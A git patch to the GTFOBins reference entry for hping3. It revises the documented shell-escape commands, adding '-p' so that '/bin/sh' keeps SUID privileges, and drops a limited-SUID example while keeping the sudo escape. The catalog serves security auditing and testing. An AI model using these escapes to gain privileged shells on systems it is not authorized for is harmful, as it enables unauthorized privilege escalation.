From 646ea8132e6761087f7f70f47f6cceada97515f6 Mon Sep 17 00:00:00 2001 From: Nick Blekherman Date: Mon, 18 Jan 2021 09:40:50 +0200 Subject: [PATCH] Revert limited-suid to suid and add -p in hping3 --- _gtfobins/hping3.md | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/_gtfobins/hping3.md b/_gtfobins/hping3.md index fecff81..a63760c 100644 --- a/_gtfobins/hping3.md +++ b/_gtfobins/hping3.md @@ -3,13 +3,9 @@ functions: shell: - code: | hping3 - /bin/sh + /bin/sh -p sudo: - code: | sudo hping3 /bin/sh - limited-suid: - - code: | - ./hping3 - /bin/sh ---